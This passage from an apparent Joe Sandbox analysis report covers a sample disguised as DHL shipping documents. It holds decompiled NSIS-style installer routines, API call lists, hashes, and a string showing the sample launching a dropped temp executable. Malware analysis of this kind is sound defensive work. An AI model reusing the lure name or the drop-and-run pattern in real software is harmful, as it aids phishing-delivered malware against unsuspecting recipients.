                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                        • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                        • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                        • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                        				intOrPtr _v8;
                        				int _v12;
                        				void* _v16;
                        				struct HWND__* _t56;
                        				signed int _t75;
                        				signed short* _t76;
                        				signed short* _t78;
                        				long _t92;
                        				int _t103;
                        				signed int _t110;
                        				intOrPtr _t113;
                        				WCHAR* _t114;
                        				signed int* _t116;
                        				WCHAR* _t117;
                        				struct HWND__* _t118;
                        
                        				if(_a8 != 0x110) {
                        					if(_a8 != 0x111) {
                        						L13:
                        						if(_a8 != 0x4e) {
                        							if(_a8 == 0x40b) {
                        								 *0x421714 =  *0x421714 + 1;
                        							}
                        							L27:
                        							_t114 = _a16;
                        							L28:
                        							return E0040462B(_a8, _a12, _t114);
                        						}
                        						_t56 = GetDlgItem(_a4, 0x3e8);
                        						_t114 = _a16;
                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                        							_v12 = _t103;
                        							_v16 = _t113;
                        							_v8 = 0x428200;
                        							if(_t103 - _t113 < 0x800) {
                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                        								SetCursor(LoadCursorW(0, 0x7f02));
                        								_push(1);
                        								E00404A32(_a4, _v8);
                        								SetCursor(LoadCursorW(0, 0x7f00));
                        								_t114 = _a16;
                        							}
                        						}
                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                        							goto L28;
                        						} else {
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                        								SendMessageW( *0x42a268, 0x111, 1, 0);
                        							}
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                        								SendMessageW( *0x42a268, 0x10, 0, 0);
                        							}
                        							return 1;
                        						}
                        					}
                        					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                        						goto L27;
                        					} else {
                        						_t116 =  *0x422720 + 0x14;
                        						if(( *_t116 & 0x00000020) == 0) {
                        							goto L27;
                        						}
                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                        						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                        						E00404A0E();
                        						goto L13;
                        					}
                        				}
                        				_t117 = _a16;
                        				_t75 =  *(_t117 + 0x30);
                        				if(_t75 < 0) {
                        					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                        				}
                        				_t76 =  *0x42a298 + _t75 * 2;
                        				_t110 =  *_t76 & 0x0000ffff;
                        				_a8 = _t110;
                        				_t78 =  &(_t76[1]);
                        				_a16 = _t78;
                        				_v16 = _t78;
                        				_v12 = 0;
                        				_v8 = E00404734;
                        				if(_t110 != 2) {
                        					_v8 = E004046FA;
                        				}
                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                        				_push(0x22);
                        				E004045C4(_a4);
                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                        				_push(0x23);
                        				E004045C4(_a4);
                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                        				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                        				_t118 = GetDlgItem(_a4, 0x3e8);
                        				E004045F9(_t118);
                        				SendMessageW(_t118, 0x45b, 1, 0);
                        				_t92 =  *( *0x42a270 + 0x68);
                        				if(_t92 < 0) {
                        					_t92 = GetSysColor( ~_t92);
                        				}
                        				SendMessageW(_t118, 0x443, 0, _t92);
                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                        				 *0x421714 = 0;
                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                        				 *0x421714 = 0;
                        				return 0;
                        			}



















                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                        • GetDlgItem.USER32 ref: 00404835
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                        • GetSysColor.USER32(?), ref: 00404863
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                        • lstrlenW.KERNEL32(?), ref: 00404884
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                        • GetDlgItem.USER32 ref: 004048FF
                        • SendMessageW.USER32(00000000), ref: 00404906
                        • GetDlgItem.USER32 ref: 00404931
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                        • SetCursor.USER32(00000000), ref: 00404985
                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                        • SetCursor.USER32(00000000), ref: 004049A1
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                        Strings
                        • "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m, xrefs: 00404960
                        • N, xrefs: 0040491F
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$N
                        • API String ID: 3103080414-456021548
                        • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                        • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                        • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                        • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004062AE(void* __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				long _t12;
                        				long _t24;
                        				char* _t31;
                        				int _t37;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				long _t42;
                        				WCHAR* _t44;
                        				void* _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t52;
                        				void* _t53;
                        
                        				_t38 = __ecx;
                        				_t44 =  *(_t52 + 0x14);
                        				 *0x426de8 = 0x55004e;
                        				 *0x426dec = 0x4c;
                        				if(_t44 == 0) {
                        					L3:
                        					_t2 = _t52 + 0x1c; // 0x4275e8
                        					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                        						_t53 = _t52 + 0x10;
                        						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                        						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                        						_t48 = _t12;
                        						 *(_t53 + 0x18) = _t48;
                        						if(_t48 != 0xffffffff) {
                        							_t42 = GetFileSize(_t48, 0);
                        							_t6 = _t37 + 0xa; // 0xa
                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                        							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                        								L18:
                        								return CloseHandle(_t48);
                        							} else {
                        								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                        									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                        									if(_t49 == 0) {
                        										_t48 =  *(_t53 + 0x18);
                        										L16:
                        										_t24 = _t42;
                        										L17:
                        										E00406113(_t24 + _t46, 0x4269e8, _t37);
                        										SetFilePointer(_t48, 0, 0, 0);
                        										E0040620A(_t48, _t46, _t42 + _t37);
                        										GlobalFree(_t46);
                        										goto L18;
                        									}
                        									_t39 = _t46 + _t42;
                        									_t31 = _t39 + _t37;
                        									while(_t39 > _t49) {
                        										 *_t31 =  *_t39;
                        										_t31 = _t31 - 1;
                        										_t39 = _t39 - 1;
                        									}
                        									_t24 = _t49 - _t46 + 1;
                        									_t48 =  *(_t53 + 0x18);
                        									goto L17;
                        								}
                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                        								_t42 = _t42 + 0xa;
                        								goto L16;
                        							}
                        						}
                        					}
                        				} else {
                        					CloseHandle(E00406158(_t44, 0, 1));
                        					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						goto L3;
                        					}
                        				}
                        				return _t12;
                        			}




















                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                        • GetShortPathNameW.KERNEL32 ref: 004062F2
                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                        • GetShortPathNameW.KERNEL32 ref: 0040630F
                        • wsprintfA.USER32 ref: 0040632D
                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                        • GlobalFree.KERNEL32 ref: 00406416
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                        • API String ID: 2171350718-2295842750
                        • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                        • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                        • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                        • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                        				struct tagLOGBRUSH _v16;
                        				struct tagRECT _v32;
                        				struct tagPAINTSTRUCT _v96;
                        				struct HDC__* _t70;
                        				struct HBRUSH__* _t87;
                        				struct HFONT__* _t94;
                        				long _t102;
                        				signed int _t126;
                        				struct HDC__* _t128;
                        				intOrPtr _t130;
                        
                        				if(_a8 == 0xf) {
                        					_t130 =  *0x42a270;
                        					_t70 = BeginPaint(_a4,  &_v96);
                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                        					_a8 = _t70;
                        					GetClientRect(_a4,  &_v32);
                        					_t126 = _v32.bottom;
                        					_v32.bottom = _v32.bottom & 0x00000000;
                        					while(_v32.top < _t126) {
                        						_a12 = _t126 - _v32.top;
                        						asm("cdq");
                        						asm("cdq");
                        						asm("cdq");
                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                        						_t87 = CreateBrushIndirect( &_v16);
                        						_v32.bottom = _v32.bottom + 4;
                        						_a16 = _t87;
                        						FillRect(_a8,  &_v32, _t87);
                        						DeleteObject(_a16);
                        						_v32.top = _v32.top + 4;
                        					}
                        					if( *(_t130 + 0x58) != 0xffffffff) {
                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                        						_a16 = _t94;
                        						if(_t94 != 0) {
                        							_t128 = _a8;
                        							_v32.left = 0x10;
                        							_v32.top = 8;
                        							SetBkMode(_t128, 1);
                        							SetTextColor(_t128,  *(_t130 + 0x58));
                        							_a8 = SelectObject(_t128, _a16);
                        							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                        							SelectObject(_t128, _a8);
                        							DeleteObject(_a16);
                        						}
                        					}
                        					EndPaint(_a4,  &_v96);
                        					return 0;
                        				}
                        				_t102 = _a16;
                        				if(_a8 == 0x46) {
                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                        					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                        				}
                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                        			}

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                        • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                        • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                        • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                        				struct _ITEMIDLIST* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _t44;
                        				WCHAR* _t45;
                        				signed char _t47;
                        				signed int _t48;
                        				short _t59;
                        				short _t61;
                        				short _t63;
                        				void* _t71;
                        				signed int _t77;
                        				signed int _t78;
                        				short _t81;
                        				short _t82;
                        				signed char _t84;
                        				signed int _t85;
                        				void* _t98;
                        				void* _t104;
                        				intOrPtr* _t105;
                        				void* _t107;
                        				WCHAR* _t108;
                        				void* _t110;
                        
                        				_t107 = __esi;
                        				_t104 = __edi;
                        				_t71 = __ebx;
                        				_t44 = _a8;
                        				if(_t44 < 0) {
                        					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                        				}
                        				_push(_t71);
                        				_push(_t107);
                        				_push(_t104);
                        				_t105 =  *0x42a298 + _t44 * 2;
                        				_t45 = 0x428200;
                        				_t108 = 0x428200;
                        				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                        					_t108 = _a4;
                        					_a4 = _a4 & 0x00000000;
                        				}
                        				_t81 =  *_t105;
                        				_a8 = _t81;
                        				if(_t81 == 0) {
                        					L43:
                        					 *_t108 =  *_t108 & 0x00000000;
                        					if(_a4 == 0) {
                        						return _t45;
                        					}
                        					return E00406668(_a4, _t45);
                        				} else {
                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                        						_t98 = 2;
                        						_t105 = _t105 + _t98;
                        						if(_t81 >= 4) {
                        							if(__eflags != 0) {
                        								 *_t108 = _t81;
                        								_t108 = _t108 + _t98;
                        								__eflags = _t108;
                        							} else {
                        								 *_t108 =  *_t105;
                        								_t108 = _t108 + _t98;
                        								_t105 = _t105 + _t98;
                        							}
                        							L42:
                        							_t82 =  *_t105;
                        							_a8 = _t82;
                        							if(_t82 != 0) {
                        								_t81 = _a8;
                        								continue;
                        							}
                        							goto L43;
                        						}
                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                        						_t47 =  *_t105;
                        						_t48 = _t47 & 0x000000ff;
                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                        						_t85 = _t84 & 0x000000ff;
                        						_v28 = _t48 | 0x00008000;
                        						_t77 = 2;
                        						_v16 = _t85;
                        						_t105 = _t105 + _t77;
                        						_v24 = _t48;
                        						_v20 = _t85 | 0x00008000;
                        						if(_a8 != _t77) {
                        							__eflags = _a8 - 3;
                        							if(_a8 != 3) {
                        								__eflags = _a8 - 1;
                        								if(__eflags == 0) {
                        									__eflags = (_t48 | 0xffffffff) - _v12;
                        									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                        								}
                        								L38:
                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                        								_t45 = 0x428200;
                        								goto L42;
                        							}
                        							_t78 = _v12;
                        							__eflags = _t78 - 0x1d;
                        							if(_t78 != 0x1d) {
                        								__eflags = (_t78 << 0xb) + 0x42b000;
                        								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                        							} else {
                        								E004065AF(_t108,  *0x42a268);
                        							}
                        							__eflags = _t78 + 0xffffffeb - 7;
                        							if(__eflags < 0) {
                        								L29:
                        								E004068EF(_t108);
                        							}
                        							goto L38;
                        						}
                        						if( *0x42a2e4 != 0) {
                        							_t77 = 4;
                        						}
                        						_t121 = _t48;
                        						if(_t48 >= 0) {
                        							__eflags = _t48 - 0x25;
                        							if(_t48 != 0x25) {
                        								__eflags = _t48 - 0x24;
                        								if(_t48 == 0x24) {
                        									GetWindowsDirectoryW(_t108, 0x400);
                        									_t77 = 0;
                        								}
                        								while(1) {
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										goto L26;
                        									}
                        									_t59 =  *0x42a264;
                        									_t77 = _t77 - 1;
                        									__eflags = _t59;
                        									if(_t59 == 0) {
                        										L22:
                        										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                        										__eflags = _t61;
                        										if(_t61 != 0) {
                        											L24:
                        											 *_t108 =  *_t108 & 0x00000000;
                        											__eflags =  *_t108;
                        											continue;
                        										}
                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                        										_a8 = _t61;
                        										__imp__CoTaskMemFree(_v8);
                        										__eflags = _a8;
                        										if(_a8 != 0) {
                        											goto L26;
                        										}
                        										goto L24;
                        									}
                        									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                        									__eflags = _t63;
                        									if(_t63 == 0) {
                        										goto L26;
                        									}
                        									goto L22;
                        								}
                        								goto L26;
                        							}
                        							GetSystemDirectoryW(_t108, 0x400);
                        							goto L26;
                        						} else {
                        							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                        							if( *_t108 != 0) {
                        								L27:
                        								if(_v16 == 0x1a) {
                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                        								}
                        								goto L29;
                        							}
                        							E004066A5(_t77, _t105, _t108, _t108, _v16);
                        							L26:
                        							if( *_t108 == 0) {
                        								goto L29;
                        							}
                        							goto L27;
                        						}
                        					}
                        					goto L43;
                        				}
                        			}

                        APIs
                        • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000400), ref: 004067C0
                        • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                        • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 4260037668-4067843436
                        • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                        • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                        • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                        • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004056CA(signed int _a4, WCHAR* _a8) {
                        				struct HWND__* _v8;
                        				signed int _v12;
                        				WCHAR* _v32;
                        				long _v44;
                        				int _v48;
                        				void* _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				WCHAR* _t27;
                        				signed int _t28;
                        				long _t29;
                        				signed int _t37;
                        				signed int _t38;
                        
                        				_t27 =  *0x429244;
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					_t37 =  *0x42a314;
                        					_v12 = _t37;
                        					_t38 = _t37 & 0x00000001;
                        					if(_t38 == 0) {
                        						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                        					}
                        					_t27 = lstrlenW(0x422728);
                        					_a4 = _t27;
                        					if(_a8 == 0) {
                        						L6:
                        						if((_v12 & 0x00000004) == 0) {
                        							_t27 = SetWindowTextW( *0x429228, 0x422728);
                        						}
                        						if((_v12 & 0x00000002) == 0) {
                        							_v32 = 0x422728;
                        							_v52 = 1;
                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                        							_v44 = 0;
                        							_v48 = _t29 - _t38;
                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                        						}
                        						if(_t38 != 0) {
                        							_t28 = _a4;
                        							0x422728[_t28] = 0;
                        							return _t28;
                        						}
                        					} else {
                        						_t27 = lstrlenW(_a8) + _a4;
                        						if(_t27 < 0x1000) {
                        							_t27 = lstrcatW(0x422728, _a8);
                        							goto L6;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}


















                        APIs
